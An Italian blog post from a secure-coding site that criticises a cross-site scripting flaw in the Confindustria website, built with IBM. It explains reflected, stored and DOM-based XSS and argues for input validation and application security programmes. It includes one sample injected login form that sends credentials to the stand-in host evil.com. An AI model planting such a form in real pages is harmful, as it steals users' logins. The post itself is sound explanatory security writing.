Paolo Perego
Paolo Perego Specialista di sicurezza applicativa e certificato OSCE e OSCP, amo spaccare e ricostruire il codice in maniera sicura. Sono cintura nera di taekwon-do, marito e papà. Ranger Caotico Neutrale, scrivo su @codiceinsicuro.

I cross site scripting. Non sono tornati, sono sempre stati qui

I cross site scripting. Non sono tornati, sono sempre stati qui Photo by on Unsplash
1680 parole - Lo leggerai in 9 minuti

Qualche giorno fa ero alla stazione di Roma Tiburtina in attesa del treno che avrebbe chiuso una due giorni di security awareness. Tra le altre cose ho parlato anche di cross site scripting, spiegando come sia una vulnerabilità ormai in giro da un bel po’ di tempo.

Leggevo su Il sole 24 ore che era online il nuovo sito di confindustria, nato da una partnership con IBM e da una media company che ne ha curato il layout grafico.

Se si è scomodata big blue appare chiaro che il progetto deve essere stato bello grosso. IBM, è utile ricordarlo, è quella che nel suo portafoglio vanta un prodotto commerciale di application security a tutto tondo, quell’AppScan croce e delizia di chi l’ha visto all’opera1.

Bene, il sito istituzione di confindustria soffre di un banalissimo cross site scripting2 nella form di ricerca, come usata per questo post.

Che cos’è il cross site scripting?

Giuro, ero indeciso se dedicare un intero post alla descrizione di cosa sia un cross site scripting e di come mitigarlo. Evidentemente sbagliavo nel pensare che l’awareness su temi veramente base della sicurezza applicativa si fosse diffuso, almeno ad un certo livello.

Quando un’applicazione web prende un input proveniente dall’esterno e lo usa così com’è nell’HTML che verrà inviato al browser allora è vulnerabile ad un cross site scripting.

Cosa significa essere vulnerabile? Significa che un attaccante può passare all’applicazione dei pezzi di codice javascript che verranno inseriti nel sorgente della pagina che sarà inviata al browser.

Ricevendo quell’HTML modificato, il browser della vittima eseguirà il codice arbitrario inserito dall’attaccante.

Quindi, se io volessi aggiungere una maschera di login ad un sito vulnerabile, potrei iniettare nel codice della pagina qualcosa come:

<form action="http://www.evil.com/evil.do">
  <input name="login" placeholder="login" type="text" />
  <input name="password" placeholder="login" type="password" />
</form>

Il cross site scripting è una vulnerabilità lato server perché è introdotta da un uso insicuro dell’input utente da parte di un’applicazione web, tuttavia viene sfruttata lato client ovvero è il browser della vittima ad eseguire il codice arbitrario.

L’applicazione vulnerabile prenderebbe il codice di questa form e lo metterebbe nell’html da inviare al browser. In questo modo ci sarebbe una form che nell’html originale pensato dallo sviluppatore non era presente. Per l’utente (vittima), questa form non è altro che parte integrante della pagina che sta visualizzando. La vittima dell’attacco è portata a credere che il contenuto che vuole visualizzare è accessibile previa autenticazione. Autenticazione, falsa, che verrebbe effettuata verso il sito sotto il controllo dell’attaccante.

Il cross site scripting è una vulnerabilità che si presenta in 3 varianti distinte:

  • reflected
  • stored
  • DOM based

Un XSS è reflected se il valore del parametro vulnerabile viene utilizzato immediatamente dall’applicazione per generare una pagina successiva. La differenza con un XSS stored è appunto che quest’ultimo salva il valore del parametro vulnerabile, che contiene il codice js arbitrario inserito dall’attaccante, in un database (ad esempio, ma potrebbe essere anche un file di testo letto successivamente). Un XSS di tipo stored quindi non viene sfruttato immediatamente dall’attaccante, ma resta lì silente fino a quando quel dato non viene recuperato da db e utilizzato dall’applicazione.

Potenzialmente un cross site scripting di tipo stored può impattare molti più utenti nel momento in cui l’accesso a quel dato è pubblico ad esempio.

Un XSS è di tipo DOM based quando il pattern d’attacco viene passato nell’url dopo il carattere #. Solitamente nelle UI evolute c’è molto codice javascript dedicato alla costruzione dell’interfaccia e al popolamento della stessa con dati che non serve vengano inviati al server. Se il javascript gestisce quello passato dopo il # in maniera non sicura, abbiamo che è possibile iniettare codice arbirtario direttamente nel DOM della pagina quando il browser cerca di utilizzare questi dati per costruire, ad esempio, la UI del sito.

La differenza importante, in questo caso, è che il codice d’attacco non viene mandato al server ma viene preso dal browser ed accodato al DOM non appena il server restituisce la pagina in risposta. Avendo spostato il codice web lato client è chiaro che anche le issue di security si spostano anche lato client.

Negli altri due casi possiamo dire che il cross site scripting è una vulnerabilità lato server perché è introdotta da un uso insicuro dell’input utente da parte di un’applicazione web, tuttavia viene sfruttata lato client ovvero è il browser della vittima ad eseguire il codice arbitrario.

Storie di ordinaria banfa

Gestire l’input in maniera opportuna non è fantascenza da Web 2.0. Vi ricordate gli anni ‘90? Vi ricordate quando si parlava di buffer overflow? Ecco, se vi ricordate cos’è un buffer overflow, dovreste ricordare come il problema fosse nel mancato controllo della lunghezza di un dato in input nel momento della copia in un array.

Sono passati una trentina d’anni e ci ostiniamo a non fare alcun controllo quando un utente ci da un input. Alcune issue di security gravi, come il XSS o le SQL Injection, potrebbero essere mitigate in maniera banale dall’applicazione di una regular expression o di qualche if che rispedisca al mittente un input quando non è quello che ci attendevamo.

Se stiamo leggendo un codice fiscale, ad esempio, sappiamo molto bene quando un input è lecito e quando no (anche senza entrare nel dettaglio se il valore passato è un codice fiscale corretto semanticamente).

Se stiamo leggendo un cognome probabilmente avremmo costruito quel campo con una lunghezza fissa, quindi perché permettere che l’utente inserisca la divina commedia?

Certo, ci hanno insegnato che i linguaggi dinamici hanno una gestione migliore della memoria e quindi non dobbiamo preoccuparci di overflow in quanto è la virtual machine sottostante a gestire le reallocazioni e le free della memoria non più indirizzata.

Corretto. Questo, tuttavia, non vuol dire scrivere codice che non si preoccupi di fare dei controlli sui valori dell’input calati nel contesto della vostra applicazione.

Al netto che porre rimedio a XSS e SQL Injection è un fatto di scrivere codice di un livello di qualità decente, questa storia mette a nudo ahimé una mancanza di awareness che interessa livelli molto in alto dell’IT italiano, laddove la qualità dovrebbe essere un must.

In confindustria non c’è un settore IT Security. Questo ci può stare, dopotutto è un’associazione che, seppur importante per l’imprenditoria italiana, non si occupa direttamente di software / web.

IBM, che ha gestito la commessa con una web agency per la parte di figosità del sito, non ha saputo dare supporto su temi di IT Security. E questo mi lascia perplesso.

Mi lascia perplesso che il loro application server, websphere, non venga installato seguendo best practices che vogliono anche l’installazione di un web application firewall. Esiste mod_security che è opensource e con l’Owasp Core Ruleset introduce un buon livello di protezione. Se non avete idea di come si installi, ne ho scritto dopo tempo fa in questo post.

Mi lascia perplesso che loro, che sono vendor di tool di application security, non abbiano come prassi consolidata quella di eseguire un penetration test applicativo prima della messa in esercizio di un sito, soprattutto se istituzionalmente importante come quello di confindustria. Hanno il software per eseguire i test, hanno il know-how (forse) perché vendono servizi professionali di security non credo abbiano problemi nell’annegare qualche K di attività in un progetto che di sicuro sarà costato qualche soldino.

Di sicuro ci sono strutture mastodontiche dentro IBM che non si parlano, ma… se io sono uno sviluppatore o un manager di IBM, davvero non so quello che fa o vende la mia azienda in campo IT Security?

Off by one

Difficilmente compreresti una casa senza porta blindata? Probabilmente no, ci sono i ladri e sono interessati potenzialmente ai tuoi averi anche se non sei un milionario.

Di sicuro c’è poca sensibilità in giro sui temi di sicurezza applicativa. L’attacco informatico viene visto come qualcosa che accade nei film e che interessa solo le banche. Se l’IT rappresenta un puro costo aziendale, e nell’era avanzata della net economy questo fa solo capire quanto anche il decision maker italiano medio sia miope, l’IT security è vista come un costo superfluo dentro l’IT.

Tuttavia, difficilmente compreresti una casa senza porta blindata? Probabilmente no, ci sono i ladri e sono interessati potenzialmente ai tuoi averi anche se non sei un milionario. Quindi la porta blindata è in realtà un investimento necessario.

Che poi, vengono attaccate le banche, parliamone… basta guardare questo report del ITRC sui data breach avvenuti nei primi mesi del 2014 per accorgersi che è un luogo comune tanto falso quanto duro a morire. Nel 2014 solo il 4,3% dei data breach negli Stati Uniti hanno interessato il settore bancario e finanziario.

A questo punto perché non lo è l’avvio di un programma aziendale di application security? Si perché se ci limitassimo a fare un penetration test ogni tanto, anche se sarebbe già qualcosa, butteremmo via soldi e tempo.

La security non è un tool, è un processo. Questo mantra lo sentite in ogni talk che si rispetti. Evitare disastri come quello del sito di confindustria quindi non è solo grazie all’esecuzione di un penetration test spot. Disastri del genere, e cose ben peggiori, si evitano con un team preparato di application security che sensibilizzi utenti finali e sviluppatori. Si evitano con linee guida di sviluppo sicuro e test di security sia rivolti al codice sorgente che penetration test tradizionali e ripetuti nel tempo.

Si evitano anche ingaggiando società terze che non la buttano solo sul blasone, ma che ci mettono anche del contenuto.

  1. e di chi l’ha potuto usare in passato quando sotto il marchio Watchfire era veramente un tool che spaccava. 

  2. a questo punto possiamo abbreviare cross site scripting con XSS, ormai siamo in confidenza. 

Vuoi aiutarmi a portare avanti il progetto Codice Insicuro con una donazione? Fantastico, allora non ti basta che premere il pulsante qui sotto.

Supporta il progetto

comments powered by Disqus
Codice Insicuro, blog di Cyber Security, sviluppo sicuro, code review e altro.   Non perdere neanche un post, iscriviti ora alla mailing list